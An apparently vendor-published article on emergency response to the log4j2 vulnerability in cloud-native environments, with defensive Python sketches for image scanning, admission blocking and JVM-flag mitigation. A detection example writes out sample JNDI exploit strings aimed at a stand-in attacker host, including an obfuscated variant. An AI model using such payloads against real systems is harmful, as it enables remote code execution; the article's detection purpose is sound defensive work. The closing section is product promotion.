Security Construction and Security Operations under Cloud-Native Architecture from the Perspective of a Major Vulnerability Emergency (Part 1)

Foreword

In recent years, cloud-native architecture has been widely adopted, and the share of business deployed in containers has grown year by year. Sudden security incidents such as major 0-day vulnerabilities pose serious challenges to emergency response. The recent outbreak of a major vulnerability with very wide impact was a real test of security construction and security operations under the cloud-native architecture.

This article takes this high-risk arbitrary code execution vulnerability as a case study to share our thinking on security construction and security operations under the cloud-native architecture.

Vulnerability Handling Review

After a vulnerability breaks out, the first concern is whether attackers can exploit it against business systems, and by what means. For container environments, from the attacker's perspective, there are usually the following intrusion paths.

Figure 1

1) Attack through the container host. This is usually caused by host configuration problems, such as a Docker Remote API that is exposed to the public network without authentication, or a Kubernetes API Server without authentication enabled.

2) Attack through vulnerable containers. This type of attack uses vulnerabilities in applications deployed in the container environment as the point of entry.

3) Attack through poisoned images. The attacker plants malicious content in images in a public registry; when such an image is pulled and run, the attack operations are carried out.

What can an attacker do?

The impact of the log4j2 vulnerability falls mainly under the second path: the attacker exploits the vulnerability in an affected application to attack the containerized workload.

Once the initial exploitation succeeds, the attacker follows the usual intrusion logic: executing malicious programs on the host, and also moving laterally across the east-west network.

How to respond quickly?

Under the cloud-native architecture, the general approach to vulnerability emergency response is the same as for traditional security incidents. First, analyze the principle of the vulnerability and the ways it may be exploited; then determine the repair and mitigation plan and formulate protection rules for the relevant security products so that exploitation can be detected and intercepted; finally, repair the vulnerability in an orderly manner.

In a container environment, the key steps can be summarized as follows:

  • First, determine the scope of impact on existing business. For example, identify all images in the registry affected by the vulnerability, and identify the affected online services.

  • Second, upgrade the protection policies of the relevant security products. For example, WAF rules and firewall rules can temporarily block exploitation to a certain extent; if necessary, also upgrade the runtime detection policy so that a successful intrusion can be quickly discovered and handled.

  • Finally, fix the vulnerability by upgrading to the officially released fixed version.

Why it's not easy

The efficiency of security emergency response and security operations depends largely on how well security capabilities have been built. The steps above describe a relatively ideal process, one that is easy to carry out only when a complete set of security capabilities is already in place.

According to the "Tencent Cloud Container Security White Paper" released by Tencent Cloud in November 2021, security capabilities among cloud-native users are uneven: capabilities such as image vulnerability scanning, host security hardening, and cluster monitoring and auditing have each been deployed by only about 50% of users, and 7% of users have no security capabilities at all when using cloud native.

Figure 2

Therefore, in the current situation, it is inevitable that emergency response to a 0-day vulnerability like log4j2 runs into various problems.

Control the scope of impact

The first step in handling a vulnerability is to control its scope. Repairing the vulnerability takes time, and because a component like log4j2 is so widely used, the impact is even predicted to last for a long time. It is therefore also very important to keep newly affected assets from being added.

This is mainly reflected in two aspects:

(1) Prevent vulnerable images from entering the registry. Strict security checks are required at the CI and image push stages to prevent vulnerabilities from being introduced.

(2) Prevent vulnerable images from running. When a new service starts, its images must be checked for vulnerabilities. Images that fail the security check must be strictly prevented from starting and running.
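In Kubernetes, a runtime check of this kind is commonly implemented as a validating admission webhook. The following is a minimal sketch of the decision step only, assuming a blocklist of vulnerable image references produced by an image scan. `VULNERABLE_IMAGES`, `review_pod`, and the registry name are hypothetical, and a real webhook would additionally need an HTTPS endpoint and a webhook registration in the cluster.

```python
from typing import Dict, Iterable, List

# Hypothetical blocklist; in practice it would be fed by image scan results.
VULNERABLE_IMAGES = {"registry.example.com/shop/order-service:1.4.2"}


def pod_images(pod: Dict) -> List[str]:
    """Collect image references from the regular and init containers of a Pod."""
    spec = pod.get("spec", {})
    containers = spec.get("containers", []) + spec.get("initContainers", [])
    return [c["image"] for c in containers if "image" in c]


def review_pod(admission_review: Dict, blocked: Iterable[str] = VULNERABLE_IMAGES) -> Dict:
    """Build an AdmissionReview response that denies Pods using blocked images."""
    request = admission_review["request"]
    blocked_set = set(blocked)
    hits = [img for img in pod_images(request["object"]) if img in blocked_set]

    # The response must echo the request uid; "allowed" carries the decision.
    response = {"uid": request["uid"], "allowed": not hits}
    if hits:
        response["status"] = {"message": "blocked vulnerable image(s): " + ", ".join(hits)}
    return {
        "apiVersion": "admission.k8s.io/v1",
        "kind": "AdmissionReview",
        "response": response,
    }
```

Matching on exact image references is the simplest possible policy; matching on image digests or querying the scanner at admission time would be stricter, at the cost of more moving parts.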

How to determine the scope of impact

1) Identify all images affected by the vulnerability

When determining the affected scope, if container image security scanning is already deployed, the security vendor will usually update the vulnerability database or detection rules as soon as possible, and users can directly scan all images in the image registry to find the affected ones.

If image security scanning is not deployed, Tencent Cloud Container Security Service provides a 7-day free trial, during which users can use the image scanning function to check image assets. As a last resort, users can use open source image scanning tools (such as Clair, Anchore, or Trivy) for troubleshooting. One thing to note: before using an open source tool, make sure that its vulnerability database or detection rules already cover the target vulnerability.
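As a rough sketch of how the result of an open source scan might be checked for one specific vulnerability, the function below searches a report shaped like Trivy's JSON output (`trivy image --format json`) for a given vulnerability ID. The field names (`Results`, `Vulnerabilities`, `VulnerabilityID`, `PkgName`, `InstalledVersion`) are our understanding of that format and should be verified against the Trivy version in use. CVE-2021-44228 is the identifier commonly associated with this log4j2 vulnerability, and the sample report is made up for illustration.

```python
from typing import Dict, List


def find_vulnerability(report: Dict, vuln_id: str) -> List[Dict]:
    """Return every package in the report that is flagged with vuln_id."""
    matches = []
    # "Results" or "Vulnerabilities" may be missing or null when nothing was found.
    for result in report.get("Results") or []:
        for vuln in result.get("Vulnerabilities") or []:
            if vuln.get("VulnerabilityID") == vuln_id:
                matches.append({
                    "target": result.get("Target"),
                    "package": vuln.get("PkgName"),
                    "version": vuln.get("InstalledVersion"),
                })
    return matches


# Made-up sample report, assumed to follow the Trivy JSON layout.
SAMPLE_REPORT = {
    "Results": [
        {
            "Target": "app/lib/log4j-core-2.14.1.jar",
            "Vulnerabilities": [
                {
                    "VulnerabilityID": "CVE-2021-44228",
                    "PkgName": "org.apache.logging.log4j:log4j-core",
                    "InstalledVersion": "2.14.1",
                }
            ],
        },
        {"Target": "alpine:3.15 (alpine 3.15.0)", "Vulnerabilities": None},
    ]
}

hits = find_vulnerability(SAMPLE_REPORT, "CVE-2021-44228")
```

An empty result only means the scanner reported nothing. It does not prove the image is safe unless the vulnerability database already contains the target vulnerability, which is exactly the caveat above.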

2) Identify affected operational workloads

Once the affected images are determined, the affected online services need to be determined from that list. If day-to-day security operations are done well enough, the image list should in theory map directly to the list of affected services. Otherwise, the corresponding security capability needs to be deployed to map image assets to online business assets.

If none of this is available, the images currently in use have to be retrieved cluster by cluster to determine whether they are affected. For example, the crudest approach is a command such as "kubectl describe pods --all-namespaces | grep -i image", which lists all images used by the workloads running in the cluster.

At this point, if there are too many images in the registry, the order can be reversed. First, use a command like "kubectl describe pods --all-namespaces | grep -i image" to query all online clusters one by one for the images used by running workloads, and then run vulnerability detection on just those images.
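A slightly more structured alternative to grepping the describe output is to parse the JSON that `kubectl get pods --all-namespaces -o json` prints. The sketch below assumes that output has been captured as a string and builds a map from each image to the Pods that run it. `images_in_use` is a hypothetical helper name, and the sample data is invented.

```python
import json
from collections import defaultdict
from typing import Dict, List


def images_in_use(pod_list_json: str) -> Dict[str, List[str]]:
    """Map each image to the sorted list of namespace/pod names that use it."""
    pod_list = json.loads(pod_list_json)
    usage = defaultdict(set)
    for pod in pod_list.get("items", []):
        meta = pod.get("metadata", {})
        owner = "{}/{}".format(meta.get("namespace", "default"), meta.get("name", "?"))
        spec = pod.get("spec", {})
        # Init containers also pull and run images, so include them.
        for container in spec.get("containers", []) + spec.get("initContainers", []):
            usage[container["image"]].add(owner)
    return {image: sorted(pods) for image, pods in sorted(usage.items())}


# Invented sample in the shape of a Kubernetes Pod list.
SAMPLE = json.dumps({
    "items": [
        {"metadata": {"namespace": "shop", "name": "order-1"},
         "spec": {"containers": [{"name": "app", "image": "shop/order:1.2"}]}},
        {"metadata": {"namespace": "shop", "name": "order-2"},
         "spec": {"containers": [{"name": "app", "image": "shop/order:1.2"}],
                  "initContainers": [{"name": "init", "image": "busybox:1.35"}]}},
    ]
})

in_use = images_in_use(SAMPLE)
```

The resulting image list can be handed to the scanner, and the Pod names give the mapping back to online workloads once an image turns out to be affected.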

How to fix

When a vulnerability breaks out, everyone hopes to understand it fully and apply the corresponding patch as soon as possible. Unfortunately, on the one hand, software development and testing take time, so the fix will not arrive that quickly; on the other hand, under the microservice architecture the number of affected images may be very large, which also makes the repair a great challenge.

Therefore, until the vulnerability is fixed, we can apply the recommended mitigations. For the log4j2 vulnerability, for example, the following JVM startup parameter can be added for temporary relief:

-Dlog4j2.formatMsgNoLookups=true

However, under the cloud-native architecture, application startup commands and runtime parameters are packaged directly into the image, which brings us back to the problem mentioned above: if the number of affected images is very large, even this kind of temporary mitigation is difficult to roll out.

Under the cloud-native architecture, we see several mitigation options:

(1) Modify the online operating environment

We can use the kubectl edit pod... command to modify the running parameters of the online service Pod to mitigate the vulnerability. For batch modification of running parameters, we have also released an open source tool.

Note that with this approach the service is automatically restarted after the parameters are modified, so users need to evaluate the risk of the restart before using it.

Figure 3
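To illustrate what a batch modification of running parameters could look like, the sketch below patches a workload manifest held as a Python dict. It is not the open source tool mentioned above. It assumes a Deployment-style manifest (Pod template under `spec.template.spec`) and that the JVM picks up the flag from the `JAVA_TOOL_OPTIONS` environment variable. `add_jvm_flag` is a hypothetical helper name.

```python
import copy
from typing import Dict

FLAG = "-Dlog4j2.formatMsgNoLookups=true"


def add_jvm_flag(workload: Dict, flag: str = FLAG) -> Dict:
    """Return a copy of the workload with the flag added to JAVA_TOOL_OPTIONS."""
    patched = copy.deepcopy(workload)  # leave the caller's manifest untouched
    pod_spec = patched["spec"]["template"]["spec"]
    for container in pod_spec.get("containers", []):
        env = container.setdefault("env", [])
        entry = next((e for e in env if e.get("name") == "JAVA_TOOL_OPTIONS"), None)
        if entry is None:
            env.append({"name": "JAVA_TOOL_OPTIONS", "value": flag})
        elif "valueFrom" in entry:
            # Value comes from a ConfigMap or Secret; it has to be changed there.
            continue
        elif flag not in entry.get("value", "").split():
            entry["value"] = (entry.get("value", "") + " " + flag).strip()
    return patched


# Invented example manifest with one container that already sets JVM options.
deployment = {
    "kind": "Deployment",
    "spec": {"template": {"spec": {"containers": [
        {"name": "api", "image": "shop/api:2.0"},
        {"name": "worker", "image": "shop/worker:2.0",
         "env": [{"name": "JAVA_TOOL_OPTIONS", "value": "-Xmx512m"}]},
    ]}}},
}

patched = add_jvm_flag(deployment)
```

Applying the patched manifest changes the Pod template, so the workload is rolled and its Pods restart, which is the restart risk noted above.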

(2) Mitigation by exploiting vulnerability features

Take log4j2 as an example. This is a remote arbitrary code execution vulnerability. In short, when a log message is written and its content contains the keyword ${, that content is resolved as a variable, which allows an attacker to execute arbitrary commands.

Therefore, this characteristic can itself be used for mitigation: the mitigation instruction is passed in through the vulnerability, in effect exploiting the vulnerability to mitigate the vulnerability.

This method has to be tailored to each vulnerability and is not universal.

(3) Blocking of exploits

The first two approaches act on the vulnerability itself so that it can no longer be exploited. The third is a fallback: if those mitigations fail or are bypassed, operations on the critical path of exploitation can still be intercepted, which also mitigates the vulnerability.

This approach depends on security capabilities. On the one hand, they must be able to detect exploitation behavior; on the other hand, they must be able to block the offending process behavior precisely. For an arbitrary code execution vulnerability such as log4j2 in particular, detecting exploitation places high demands on security capabilities.
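As a rough illustration of why detection is demanding, the sketch below flags input containing a `${` lookup expression, with a stricter verdict for the `${jndi:` form commonly associated with exploitation of this vulnerability. It is a deliberate simplification: the three verdict names are hypothetical, and real payloads are often obfuscated with nested lookups, so a plain pattern match like this can be bypassed and should not be taken as how a security product detects exploitation.

```python
import re

# Any lookup expression start, as described for this vulnerability.
LOOKUP = re.compile(r"\$\{")
# The direct JNDI lookup form; obfuscated variants will not match this.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def classify(text: str) -> str:
    """Return a hypothetical verdict for one request field or log line."""
    if JNDI_LOOKUP.search(text):
        return "block"
    if LOOKUP.search(text):
        return "review"  # contains a lookup, but not an obvious JNDI one
    return "allow"


verdicts = [
    classify("GET /search?q=${jndi:ldap://attacker.example/a}"),
    classify("User-Agent: ${${lower:j}ndi:ldap://attacker.example/a}"),
    classify("GET /index.html"),
]
```

The second sample shows the limitation: a nested lookup hides the keyword from the strict pattern and only the generic `${` check notices it, which is why blocking at the process behavior level is needed as a further layer.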

With these temporary mitigations in place, the next step is to upgrade the affected components to the officially released stable fixed version in an orderly manner, taking into account which images are used in the online environment as well as business importance and priority.

Challenges and advantages of security operations under cloud-native architecture

From the handling process above, we can see that under the cloud-native architecture the container environment brings both challenges and advantages for vulnerability handling and repair.

Challenges

1) The number of images is large. On the one hand, log4j2 is a very widely used component, and under the microservice architecture applications are split into many fine-grained microservices, so the affected images span many repositories. On the other hand, with agile processes such as DevOps, each image in the registry has many versions (each repository has many tags). As a result, the number of affected images found during vulnerability handling is huge.

2) Zombie images. A zombie image is an old or expired image still stored in the registry that is almost never run any more. Without a good management mechanism for the images in the registry, the number of such images also becomes very large. This is easy to understand: DevOps brings rapid business iteration, which naturally produces a large number of expired images.

In normal security operations, these zombie images should in principle be removed promptly (there is no need to worry about backup and rollback, since the code repository covers that). The cleanup needs to cover not only the image registry but also zombie images on the hosts.
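One simple way to find cleanup candidates is to compare what the registry stores with what is actually running. The sketch below is a minimal version of that idea under several assumptions: every image reference carries a tag, push times are ISO-8601 strings in one consistent format, and the newest `keep_latest` tags per repository are protected as a cautious default. `zombie_images` and all sample data are hypothetical.

```python
from collections import defaultdict
from typing import Dict, List, Set


def zombie_images(registry: Dict[str, str], in_use: Set[str], keep_latest: int = 1) -> List[str]:
    """List registry images that are neither running nor among the newest tags.

    registry maps "repository:tag" to its push time as an ISO-8601 string.
    """
    by_repo = defaultdict(list)
    for ref, pushed_at in registry.items():
        repo = ref.rsplit(":", 1)[0]  # assumes every reference ends in ":tag"
        by_repo[repo].append((pushed_at, ref))

    zombies = []
    for entries in by_repo.values():
        entries.sort(reverse=True)  # newest push time first
        protected = {ref for _, ref in entries[:keep_latest]}
        zombies.extend(
            ref for _, ref in entries
            if ref not in protected and ref not in in_use
        )
    return sorted(zombies)


# Invented sample data.
REGISTRY = {
    "shop/order:1.0": "2021-10-01T00:00:00Z",
    "shop/order:1.1": "2021-11-01T00:00:00Z",
    "shop/order:1.2": "2021-12-01T00:00:00Z",
    "shop/cart:0.9": "2021-09-01T00:00:00Z",
}
RUNNING = {"shop/order:1.1"}

candidates = zombie_images(REGISTRY, RUNNING)
```

The same comparison applies to images cached on hosts, with the host's local image list in place of the registry listing.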

3) Immutable infrastructure. A typical feature of cloud-native architecture is immutable infrastructure: once a service is deployed, it is never modified in place. If anything needs to be updated, repaired, or changed, a brand new service image is built to replace the old one; after verification, the service is redeployed with the new image and the old one is deleted.

This feature makes vulnerability mitigation for online services inconvenient. On the one hand, runtime parameters, environment variables, and similar settings of the application are hard to modify; on the other hand, making such changes triggers runtime security alerts of its own, because the operation violates the requirements of immutable infrastructure and is not a normal business operation.

Advantages

• Asset visibility and fast location. Assets have always been an important and most troublesome issue in security construction and security operations. Cloud-native architecture solves the asset problem well: through orchestration platforms such as Kubernetes and components such as image registries, we can quickly inventory assets and locate problems.

• Process automation and fast rollout. Orchestration platforms such as Kubernetes provide a complete set of automated business management capabilities, including configuration management, service orchestration, and task management. A vulnerability fix can therefore be distributed quickly and rolled out through a grayscale upgrade.

• Security shift-left for quick control. Security checks can be shifted left into multiple stages such as CI/CD: images are checked before they are stored, so that vulnerable images are not pushed to the registry and incremental risk is reduced; admission checks are performed at runtime, so that images with vulnerability risk are prevented from starting and the newly exposed surface of the online environment is reduced.

• Microservice architecture. Under the microservice architecture, applications are relatively independent, which benefits vulnerability repair. On the one hand, fixing a given image has a small impact, which improves repair efficiency; on the other hand, each service has a single function and commonly duplicated functions become independent services, which reduces the number of repairs.

The outbreak of this vulnerability has sounded the alarm for cloud-native security construction and operations. Taking this incident as a starting point, enterprises need to consider the construction and operation of security capabilities comprehensively as they adopt the cloud-native architecture. In the next article, based on our own practice, we will systematically share our thoughts on security construction and security operations under the cloud-native architecture.

About Tencent Container Security Service (TCSS)

Tencent Container Security Service (TCSS) provides security services such as container asset management, image security, cluster security, and runtime intrusion detection. It secures the full container life cycle, from image build and deployment to runtime, and helps enterprises build a container security protection system.

Tencent launched a comprehensive cloud-native migration strategy on September 30, 2018, which has so far reached a scale of tens of millions of cores. The container security service product team draws on security governance and operations experience from the industry's largest container clusters to refine its products, promotes the formulation of industry standards and specifications, and was the first to publish the "Tencent Cloud Container Security White Paper", which analyzes and summarizes the current security status of domestic container environments to support the standardization and healthy development of the cloud-native security ecosystem.

